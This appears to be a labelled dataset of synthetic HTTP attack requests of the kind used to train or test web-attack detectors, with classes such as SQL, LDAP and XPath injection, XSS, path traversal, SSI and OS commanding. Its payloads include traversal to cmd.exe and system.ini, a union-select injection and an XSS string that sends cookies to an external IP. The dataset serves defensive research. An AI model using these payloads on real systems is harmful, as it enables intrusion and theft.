Max-Forwards: 7785
MIME-Version: 9.6
Pragma: alhEo=Waftia
Proxy-Authorization: js4s roojs=esisDfnn
Authorization: iayn swoew=hcer
Range: 20-
Referer: http://www.lhdsse.biz/tEbpbr/sdrl/Kceenc/4etd/ecat.wmn
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Authorization
User-Agent: iupUWYO http://www.MixE.net
UA-CPU: x86
UA-Disp: 7475,9890,8
UA-Color: color16
UA-Pixels: 895x7143
Via: mclNe/9.8 210.195.80.211, e0e/6.6 155.34.137.200:1757
Transfer-Encoding: identity
Upgrade: embo/8.5, uxtTs/2.4, seigc/8.0
Warning: 388 121.16.17.175 "hee9lp" 
X-Serial-Number: 9071704820
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttAeyiks=6tthtwuxrneu&oh2exgtoss=s9jo2Gvfe._&Fti=9081454&civ7oaleE6c=t$]]%u%reoRt&ftehosh=4780&wo=490&hnoOeegVLenrai=tBmocha|l49xsY&emi3llwr=twA6k9p8D

End - Id: 48274
Start - Id: 36511
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 111.124.64.172
Connection: trycs
Accept: text/html;q=0.8, video/*, application/*;q=0.8
Accept-Charset: iso-8859-5, windows-1253
Accept-Encoding: 
Accept-Language: eo-rqise;q=0.5, faes-rheni, HiOe-y, t9-aye;q=0.0
Cache-Control: ctwc='Hs'
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="048"
Date: Wed, 17 Dec 08 07:55:27 CET
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Thu, 01 Mar 07 05:39:05 GMT
If-Match: *
If-None-Match: "oAKv5rH3P@43Mcy"
If-Range: *
Max-Forwards: 3924
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: /88iAfd/ilwaenod/oEind/1or2.cgi
TE: trailers,deflate,deflate;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/8.6 (Windows; U; Win98 9.5; ar-ez; rv:9.6.4) Gecko/35623076
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: onnhe/9.3 www.wadil.jpg, 6.1 www.4poi.shtml, HTTP/9.2 www.Srfo.js
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36511
Start - Id: 47732
class: XSS
GET /cw.bin?mndiaedi=ie6oag&ne4aeeWecih=974&riPRgmueTaiear1=6p+++onload%3Djavascript%3A++alert%28rrs8a.bs7acT%29&iyiROcebeqeiEst=ryocw&bcaR7=073&trhe3rjen2ndnot=8433&Y5oaednNn9eocn=e3rUVt7L3E6&e02r1epeg=90520&njbD=dqmrac0lsm&sseriua4c0teo=eHrTXivEu&cEBwzxne=+sn&object3wNlibIkg.Ehtacces9=990486&qt=4540 HTTP/1.0
Host: www.btieethno5.be
Connection: close
Accept: image/*;q=0.7, video/quicktime, application/*
Accept-Charset: macintosh;q=0.9, windows-1257;q=0.9, x-mac-hebrew, x-mac-cyrillic;q=0.2, iso-10646-ucs-2;q=0.1
Accept-Encoding: deflate;q=0.5
Accept-Language: ape-nsna2Ud;q=0.7, r-yw00, i-nugr, O7soae-t;q=0.7
Cache-Control: no-store
Client-ip: 200.103.37.162
Cookie: anxhtixi9se2I=gsytiieleeQ;eth9eedkvo3he=Eln8ecironhnmiotO;olpdo7vhEti61=r3r(;pdbNdmSauSt=e(;AVmiaeTtft4erce= l;igiogsd6nneague=aeVR4
Cookie2: $Version="054"
Date: Thu, 04 Jun 09 14:13:20 UTC
ETag: "NjsmIW8.0lHCNMiSrPa"
Expect: 100-continue
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Thu, 29 Jun 06 06:33:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: dwhjmsh=alInyo
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://04aR.st/IpidxdeT/7eqeo/dqn0/lnugf/Dleaa.mdb
Range: 9-,057-2,501963-763
Referer: /uiaeeL/beenyl2/meuyH/kobe/ejimoe.fgf
TE: chunked
Trailer: Date
User-Agent: ohkehmei7hn6shoedt
UA-CPU: PowerPC
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: cOfrc/1.9 71.193.13.185, 7.1 239.80.45.165
Transfer-Encoding: gzip
Upgrade: 1eEw/6.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 399335844567
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47732
Start - Id: 45940
class: PathTransversal
GET /aoeb/xiascnw/m3E5/haobehe/hcRNG2E6Eiq8MrepOrr4/akE9/6tARm/ioS9wlpsp0huijo/aWdFzM-ka4KhchxpoM/3zPcm/tAZqhiKkKfd/1e6igE8Xt@tUa.mspx?ohgnuuEahD=4589522&pthjrs1ac=53&9Gy9rc=6aozasilgycNftd4q&sLfnt=yteh%26i1wecsirt&dmehttsixoNiaH=rTiga&aeefef7asso=dT2itodTpl57&x8ARTEcM5q=r1jftnaowucixehs&5miyms1rzp2roe=rHCj&stpdMtttp2=h9udP&veot9=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: www.AIria.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: e-hed, 45ro2I-ql;q=0.2, le-iO;q=0.3, eegedwjw-ran;q=0.1
Cache-Control: max-age=07355
Client-ip: 253.221.96.27
Cookie: 2wHbody3UFd='doewyaoperl +T;renqlnhbAi=33169;tpeteeix8a=h8NaneareeadOe
Cookie2: $Version="64"
Date: Tue, 04 Apr 06 03:53:50 UTC
ETag: "I-1Vu8lJh1NeMa7Y"
Expect: eT6euen=9eaNn9nm;meo5si=0tshnnor
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Sun, 22 Apr 07 13:18:49 GMT
If-Unmodified-Since: Sat, 05 Jan 08 13:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 8810
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://n3o3.ch/ug33as/gntocra/cEtIOe3/8tansN.dll
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 7.1; oE-ai; rv:3.7.5) Gecko/54750387
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 398 www.smeahedb.tiff "s3nlja40" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45940
Start - Id: 38176
class: LdapInjection
GET /gJRMi@P3An7/rq/yWwL4V@bm_ovUh.ld/iAg/bKll/Itmpboot.ini/l73p4JTd/1aer/0-yw.1urPYhiSLsmMHS/Wm4UDEDHR.jpeg?nehsgetnene=%29%28++++%7C+++%28cn%3D*o+%27brien*+++%29%28mail+++%3D*o++%27brien*+%29++++&ta9ht5iisai3m=okd-SLGr&hiri5e3c=o51ssn&wte0MU4hgudioh=47456869&tr1ooedehtngttk=84088208&Znph-8Fn_unionKe.1=15605857&m6ete=382&gk6jA8=3576191910&8o=Qkj%24&0utervtagalw=dboti&k6ceienenrAch3n=49837817&uhAco1eielnr=%246+dRfeH%2FP+s&fpsaayamFEs=hcd4s HTTP/1.1
Host: 82.191.27.57:082
Connection: close
Accept: image/*, image/png;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, gzip;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=3
Client-ip: 40.128.48.190
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="370"
Date: Mon, 24 Sep 07 09:50:51 UTC
ETag: W/"cvMbx4sfux4.USQJj"
Expect: Lsssd
From: 5n7e@llnrwde3K.st
If-Modified-Since: Sun, 12 Dec 04 08:40:40 GMT
If-Unmodified-Since: Fri, 14 Sep 07 18:03:39 CET
If-Match: "jfvP4vpGK-eKCK9x@@c"
If-None-Match: *
If-Range: Mon, 28 Mar 05 14:38:31 GMT
Max-Forwards: 4352
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWFjdGNpcHQ3ZGM5U2hjc2Vzc24xdEllRWN0c3VramVIdA==
Authorization: Basic dHNzMmRxZzpuZHJyZWw=
Range: -58269,-622
Referer: /twnD/3nspAmsi.html
TE: trailers
Trailer: Via
User-Agent: Oftdhooeh (eJWYY_Nq7i; zH5LBZ1; zTf356v@j)
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 431x6925
Via: 3.2 www.aRput.tiff
Transfer-Encoding: identity
Upgrade: nume/0.6, Uma/7.3
Warning: 714 196.134.47.248 "mvqoncbecrdtrzc" "Wed, 27 Jul 05 23:32:10 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38176
Start - Id: 50021
class: XPathInjection
POST /E-ILMA@Uupdate/yF_87PK4kcdtZ/4lPFXd/0WnYEhMT_gkqr/sj5Khu.btNM475fps/5ZOTunion/7t8vlwaeehootesd/foflog2loglJ@P/wSmyn7athaifNs/3N9/WIgnnnOservicesLnpassthru/rw.hhbe.css? HTTP/1.0
Content-Length: 68
Content-Language: zS4i,es7t
Content-Encoding: gzip
Content-Location: /i2a9hfh.jpeg
Content-MD5: b3NvZ24xZXVPOHhkb2Vzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Jul 09 06:27:32 GMT
Last-Modified: Tue, 07 Jul 09 10:28:31 UTC
Host: www.cy8eoe5.cz:80
Connection: 6jsaetq
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9649
Client-ip: 21.168.135.247
Cookie: iglgltsoYobro=7XpV;mfaadehitfcts2u=echon;nnwE57ginHf=ebqlBJ0vXXw;r6hcete=dsctscriptr
Cookie2: $Version="4"
Date: Fri, 16 Oct 09 17:30:48 GMT
ETag: "JNImyIsVCIyz3habo"
Expect: e6e4wdEw
From: helbt@metbhhshe.st
If-Modified-Since: Mon, 12 May 08 09:28:12 UTC
If-Unmodified-Since: Wed, 02 Sep 09 20:51:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.7
Pragma: epO1=arhnn
Proxy-Authorization: gyw29o 3Asem=ItLtbs
Authorization: aieaea hlrd=iybkxd
Range: 7-907,5585-81749,-584464
Referer: /sec5ua4/oLrrnlO4/rHRqiub/rot6dd/9Rttn.msf
TE: chunked
Trailer: Accept-Language
User-Agent: (i    <  count(5hTruo/child::text())   and j     < count(qe/child::comment())     and   k    <    count(r064/child::*)    )
UA-CPU: 68000
UA-Disp: 5474,115,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2146x828
Via: 1.6 www.qaOisew.jpeg, meayw/5.0 www.ideohe.jpg, are8To/0.1 www.uPah.tiff
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 122 161.241.199.246:74079 "tsotlrnCt" "Sat, 16 Apr 05 20:50:24 UTC"
X-Forwarded-For: 84.189.52.115
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SA0BDb=38166&itelKlitaCsmhae=oh3PA8Y&ryn=071387061&gnh6=nez4enhosion

End - Id: 50021
Start - Id: 43971
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 150.164.41.251
Connection: keep-alive
Accept: text/xml;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: t-eIzrtel;q=0.3, seusee-nujul;q=0.0, iatt-srSn;q=0.9
Cache-Control: max-age=32
Client-ip: 25.103.27.234
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Sat, 18 Aug 07 20:51:50 UTC
ETag: W/".M73M1s.vEWh-qdTs"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Sun, 23 Apr 06 15:11:01 UTC
If-Unmodified-Since: Thu, 23 Oct 08 17:17:14 CET
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Wed, 26 Dec 07 09:23:21 CET
Max-Forwards: 0
MIME-Version: 6.8
Pragma: t3tcA=wsige
Proxy-Authorization: Digest nonce
Authorization: Digest response="bCb71bf84af70Cd0eF014Adf964Ab7FA"
Range: 2873-08
Referer: http://ptud.cz/eaxtttOe/ithmo/ditn/1atd3ec.php3
TE: deflate
Trailer: Referer
User-Agent: Mozilla/8.1 (compatible; ooiyaaet; Windows NT; hc47srhrl; eitatOMbes; tttnfh8so)
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: ehi/8.3 www.pyAie.css, FTP/8.5 175.201.89.58, FTP/3.4 www.BeOEiazm.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43971
Start - Id: 37306
class: LdapInjection
GET /n40AgCU/Q_/s6sp.hv/rIa9r/TQUDoEZ1R/t08-JISl8LJs8BvQz.swf?0o56nblnXc=a9tMhis19tetve&go=oi&euneue4=ftewheree%28%5Binhtn3we&cuanNue8r=2tn&et=slsw5&rqfSXxtermTfkttB=14ala&lohwrs=EHsd&pincludea_A65=9204&oTeIEOonwdcw=9478286&Onwsd4distit=2Mcmd+&nDc=li+ut%29h1sjbt%3C&3eeeerssldpFfre=na4i%26&ak40r2gtoaho=hPYgK&t3aatnanw1ntir=3195095517&me=6JKof- HTTP/1.1
Host: www.iEPL.ch:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: cp-936;q=0.3, windows-1254;q=0.5, windows-874;q=0.8
Accept-Encoding: gzip;q=0.9, deflate, deflate;q=0.0, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 114.21.239.10
Cookie: tn=i-o;nxrrshs=ptlr;5Eaccept-wtiframe1UV=inse
Date: Thu, 18 Jun 09 04:46:39 GMT
From: renaseu@zeie4ptso.uk
If-Modified-Since: Sun, 13 May 07 11:24:46 GMT
If-Unmodified-Since: Thu, 26 Jun 08 01:55:19 GMT
If-Match: "UJFdYVDsOSyZoU9ERr"
If-None-Match: "FiYpy5UpDVnBwVhLB0aZ"
If-Range: *
Max-Forwards: 61
MIME-Version: 2.5
Pragma: mmwrpi0=wet
Authorization: Digest nc=db30Cb41
Range: 9-
Referer: http://tzbBeu.fr/le3iy4z/nayJcNka/tiosn/mhFzIeE/MolEaI.jpg
TE: trailers
User-Agent: mtn)( |    (Ahk=*)
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: 8.1 www.arbleen.tiff
Transfer-Encoding: deflate
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 988 www.Panx.gif "uhhf" "Wed, 07 Mar 07 21:03:39 UTC"
X-Forwarded-For: 97.235.140.149
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37306
Start - Id: 41596
class: SqlInjection
GET /g3nnk9ru/emnro/rd3uLwNN1m.mspx?voa=dkDBptC&WKxjgx53cmd=stdin8&8hwm=%3B+exec++get_cust%28%27x%27%27++++union+++++select++++object_name%2Cobject_type%2C%27%27x%27%27+from++++user_objects++++where+%27%27b25ee%27%27++%3D++++%27%27++++%27++++%29%3B&2j7FtOBselect=r6wqXU7 HTTP/1.0
Host: www.atgcdidgt9.cz
Connection: close
Accept: audio/basic
Accept-Charset: cp-950;q=0.4, iso-8859-8-i, windows-1258;q=0.4, iso-2022-jp
Accept-Encoding: deflate;q=0.2, identity, deflate, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 70.60.65.162
Cookie: havinguBcopydelete6jQv=3;Nba=514251;itxdleu1ce=s 3
Cookie2: $Version="973"
Date: Mon, 13 Jun 05 02:02:58 CET
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Mon, 23 Mar 09 17:01:17 CET
If-Unmodified-Since: Tue, 25 Nov 08 07:27:59 GMT
If-Match: *
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Wed, 27 Dec 06 13:44:20 CET
Max-Forwards: 5228
MIME-Version: 3.6
Pragma: 4nehtl='esde8RFd'
Proxy-Authorization: Basic U3MwcGhyd2E6c2FldG4=
Authorization: NTLM Z21zbWV0Y29obHdlZGhFYUhMbmNvZXZvbHVlbWVveXRidWlybGVxdjZvVmk=
Range: 7594-
Referer: /edee0.css
TE: trailers,trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/0.2 (compatible; Konqueror/9.5; Windows NT; stfhil; remottt9rr; tsciruemT)
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.2 110.10.137.212, 1.1 87.34.212.183
Transfer-Encoding: identity
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41596
Start - Id: 45630
class: PathTransversal
GET /6WNHYxxd8vbscript8.js?ykutame=ajuwto5rtefgdt&nnemooa=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fchreelnali%2Fentaen%2Fllanllli%2Fannane.asmx&-vSPvbscriptrlu2=ckyoatgeO HTTP/1.0
Host: 53.9.145.3:5
Connection: sirpP
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.5
Accept-Language: h-lpga1o;q=0.1, mT-uiwhtn;q=0.6, dbnn-FeaiTc
Cache-Control: no-cache
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Sun, 27 Jul 08 19:02:46 CET
ETag: W/"X2JKpknOV_ZB@K8FwCPm"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Wed, 28 Dec 05 22:28:38 GMT
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.8
Pragma: un='tdt0lmUh'
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic b2pOYWVJdDplNzFv
Range: 41-9272,-212,7881-582
Referer: /ttrrsle/Aatm0ao/fatroi.tiff
TE: chunked;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: 0oliadeinnntrenaarri
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: compress
Upgrade: swEhro/0.3, styaoN/2.4, hstyr/7.6, tad/3.5, irhdn/3.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45630
Start - Id: 39313
class: SSI
GET /lem13XWEO/L6ho.jpg?1aroa=-&usnc=%3C%21--%23email+fromhost%3D%22www.wudohaw.com%22+tohost%3D%22mailbox.0ess.com%22+message%3D%22arhdyE+vA7347+ln+vuraes%22+fromaddress%3D%22q7taid.com%22+toaddress%3D%22daswe.u7eS.com%22+subject%3D%22s%22+sender%3D%22riou.com%22+replyto%3D%22dcA7si.com%22+cc%3D%22dm%22+inreplyto%3D%22ii+nda5+Te%22+id%3D%22sTelmail%22+--%3E&hynerT0u=te&aworL4d=336179&twfpd6Sneoh=epadeoqaesaye&mgrN=%2Bnt HTTP/1.0
Host: 226.136.253.166
Connection: close
Accept: audio/x-wav, application/rtf, audio/basic;q=0.7
Accept-Charset: x-mac-roman, iso-8859-1;q=0.7, iso-8859-3;q=0.5, iso-8859-8, windows-1255
Accept-Encoding: deflate, compress, identity, identity, gzip
Accept-Language: MO-oiu, ncq-teobn19, itf-Silf;q=0.3, absr-vdio8t;q=0.1, 9gthah-Eoels0;q=0.6
Cache-Control: only-if-cached
Client-ip: 192.88.225.132
Cookie: Obp=c
Cookie2: $Version="6"
Date: Mon, 28 Dec 09 15:34:28 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Fri, 24 Jun 05 18:18:24 GMT
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Fri, 15 Feb 08 18:17:11 GMT
Max-Forwards: 2
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: NTLM ZnRtZG9hdG9uaWVtaWdIMTd1b2VubjA1YmN4cDV0RGVlYXBuMm90QWVNeWQxZ2Fl
Range: 326-,2201-0740,2-99478
Referer: /iOuyoIp.conf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 8.0; nn-gh; rv:6.9.8) Gecko/68612805
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: uiton
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39313
Start - Id: 47594
class: XSS
GET /0a8AYautoexec/hu7GPiofctwo/i0sTpfasyeUestariglr/envIVUb_gIODVrhOws/att/aelaiguda1veeng0a8/hxNg5HNJmblWL26URIj/t9ShoieeMetwEeerore/icesaooflEtg1uymde/wqb_TRopthome/amrljIm1O.html?It20d=b7iUwawqr7ltgh&5qPG=xodlionw6BrssbOune&wpcakn=27618151&aw0=tcaha&YAtmp8--baHdr_=%3Cobject+classid++%3D+++%22+++++clsid%3A...++%22++codebase++++%3D++++%22+javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F66.70.68.121%2Fesas.cfm%27%2Bdocument.cookie%29%3B%5D++++%22%3E&xyeot=5342517 HTTP/1.0
Host: www.G5u8l.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: lallk-adrhhpO
Cache-Control: nt5oo=2MFa8aae
Client-ip: 84.76.139.10
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="1"
Date: Wed, 22 Jul 09 01:34:16 UTC
ETag: W/"k.NJardhH9CSLO.eFKv"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Sat, 01 Mar 08 18:36:48 CET
If-Match: "WdX4GeGzKNv5A_XO"
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /YosbEnT/sduRd/tjelh/otlyw/eNfsscym.asmx
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: b1wksPn http://www.ualhbqoa.ch
UA-CPU: x86
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 428x2370
Via: 6.6 www.t0ItPd.gif
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47594
Start - Id: 42368
class: SqlInjection
GET /sKmN85/fyautoexecKformHu8O@X4/6TP6/i5wVsVAQLCNkI27aG4.bin?2YAEneot=bnjW3m&haefkientic=tede&al8=4&2ehthe=%3Eslnph-&off2cnedc=%24iDNallrHut&Oeo=ot2d+%24r%28tmpaornullmes&y1=+eny8&t2u3ah8teo=68&aI=640468&nom1fnnleoO=rhJN30LnH&eio=986&hg6VN-tmp=ni0MRet&Cl=and+0%3C%3E%28select+count%28*%29+++from+++ybrr+where++++hl%3C%3E%29 HTTP/1.1
Host: 177.236.127.93
Connection: smnue
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o-pon9ehcz
Cache-Control: max-age=18
Client-ip: 6.250.155.154
Cookie: gpigaOuleedE=46311733
Cookie2: $Version="88"
Date: Mon, 06 Sep 04 10:57:55 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Thu, 31 Aug 06 10:02:40 UTC
If-Match: *
If-None-Match: *
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 8
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: http://0ceu.uk/mcxrO/khnrst/hEfiss1.js
TE: chunked;q=0.8,deflate,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 3.3; ri-hi; rv:3.5.7) Gecko/58782937
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x018
Via: 0.9 24.65.139.68, HTTP/5.3 106.15.140.9
Transfer-Encoding: arHI; aaRkqh=hjyhs6o
Upgrade: ptai/1.8, nrw/3.3, 5vdio/0.4, eol/0.5, rtemsh/1.9
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 222.98.17.178
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42368
Start - Id: 47740
class: XSS
GET /QXKHconnectzCIbinphpGn/ayJL1To9Oqyo9h/eMUsHdcgJZun3ZHd@S9/adleourhe/Eoemtd/org/tZ-cNQ/iEf7i53jSr4k4ud/VTf.BAM_qNt/H1ienahtsecgaerndrsn/r22ooc9s4Lqe9nfigsa.html?ZqqC@dY-9pyy=shsncla6dhn+3e&qQKZZ=lam3bia1&n67pf=28&ramrnJoloi=ytpsn4ol&yJDm8Q8hxml.=cenmOtsTovarmjsh&nnetcatuY45=bdn8autoexectmpe5%29opennacceptrepsttsam0&sh6juelelHte=31315&ninwm=%3Aswpws&hiotzutrCs=banoit%5Dlaro8%5C&eglalqdOA=seostprocessing-instruction1e&ricterh7k9rG=5338&tsoe3nqAchguehf=89467911&te=tn1%22+++%3E%3Cbody%2520onload%3Dalert++++%28document.cookie%29%3B++++%3E&a-jb8HUY=370 HTTP/1.0
Host: 92.242.21.253:1515
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 241.206.24.189
Cookie: tieoP=97051;mxbR.s7=eeqm6e;ZexecfKFaWRVobjectTb=2xwuoscriptHeaamrhte;Ysamiwigphp8QEc=ncwrtaarristt
Cookie2: $Version="054"
Date: Wed, 14 Sep 05 22:24:55 GMT
ETag: "B3GtyHgDy1kQ_H-."
Expect: asn70
